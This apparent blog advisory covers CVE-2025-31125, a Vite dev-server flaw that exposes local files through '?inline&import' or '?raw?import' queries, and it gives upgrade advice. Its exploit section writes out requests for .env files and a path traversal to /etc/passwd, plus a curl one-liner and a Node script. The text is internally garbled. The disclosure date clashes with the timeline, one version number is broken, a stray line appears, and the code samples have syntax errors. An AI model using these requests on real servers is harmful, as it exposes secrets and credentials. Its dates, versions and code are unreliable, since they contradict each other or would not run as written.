CVE-2025-31125 - Vite Leaks Local Files via ?inline&import or ?raw?import

On June 10, 2024, a new vulnerability, CVE-2025-31125, was disclosed affecting Vite, a modern build tool for JavaScript projects. This issue allows attackers to request local files from the Vite dev server using specific URL parameters. If your Vite server is exposed to the internet (using --host or server.host settings), your project files—and possibly sensitive data—could be at risk.

Vite patched this in versions 6.2.4, 6.1.3, 6..13, 5.4.16, and 4.5.11. If you're on an older version, you need to upgrade immediately.

Let's break down how this vulnerability works, see real code, and learn how to keep your projects safe.

What Is the Problem? (The Vulnerability)

Usually, Vite only serves files intended for your frontend app during development. But a flaw in the dev server allows users to fetch files outside the intended set—anything readable on the local system—by adding ?inline&import or ?raw?import to a request.

This is called a "Local File Disclosure". Anyone who can access your dev server can ask for files like your environment variables, private config, or source code—even files you never meant to share.

Who Is Affected?

- Only dev servers explicitly exposed to the network (using Vite's --host CLI flag, or the server.host config) are at risk.

Let’s say you’re running a Vite server with this command

vite --host

Or your vite.config.js looks like

export default {
  server: {
    host: '...',
    port: 5173
  }
}

Normally, only index.html, src/App.vue, etc., are served. But with this bug, a user could see any file like so:

http://your-server-ip:5173/.env?inline&import
http://your-server-ip:5173/package.json?raw?import
http://your-server-ip:5173/../../secret.txt?inline&import

If your dev server is on a public IP, an attacker just needs your address.

Sample Exploit

Suppose you're running Vite on a remote server with (unsafe) network exposure. An attacker can request:

GET /package.json?raw&import HTTP/1.1
Host: your-vite-server:5173

You'd see the full text of your package.json file in the browser.

Or, leak secrets

GET /.env?inline&import HTTP/1.1
Host: your-vite-server:5173

Even worse, path traversal with ../ was possible in some cases, e.g.

GET /../../etc/passwd?inline&import HTTP/1.1
Host: your-vite-server:5173

Here’s a simple curl command that demonstrates this bug (before patch)

# Replace <your-vite-server-ip> and file path
curl "http://<your-vite-server-ip>:5173/.env?inline&import";

Or, in JavaScript (Node)

const http = require('http');

http.get('http://your-vite-server:5173/.env?inline&import';, res => {
  let data = '';
  res.on('data', chunk => data += chunk);
  res.on('end', () => console.log(data));
});

4.5.11

Never ever expose your dev server to the open internet unless you know exactly what you’re doing.

Example upgrade (if you use npm)

npm install vite@latest

Or pick the right version

npm install vite@6.2.4

Double-check your vite.config.js to make sure server.host never says '...' or your IP unless you 100% must—and then put it behind authentication or a firewall.

References

- CVE-2025-31125 at NIST NVD
- Vite release notes (GitHub)
- Discussion on the disclosure (GitHub issue)
- Vite Documentation

Quick Recap

- CVE-2025-31125 lets people fetch any file via Vite dev server using ?inline&import or ?raw?import.

Don’t run Vite dev servers on open networks.

Stay safe, and always keep your dependencies up-to-date!

Timeline

Published on: 03/31/2025 17:15:43 UTC
Last modified on: 04/01/2025 20:26:22 UTC